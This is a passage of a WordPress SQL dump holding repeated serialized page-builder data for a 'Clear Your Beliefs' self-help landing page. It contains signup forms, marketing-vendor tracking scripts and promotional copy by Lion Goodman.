IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2814:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:511:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><p> </p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1316, 1777, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1181:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; bottom: -58px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2812:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:511:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><p> </p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1317, 1778, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1182:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; bottom: -47px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2812:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:511:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><p> </p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 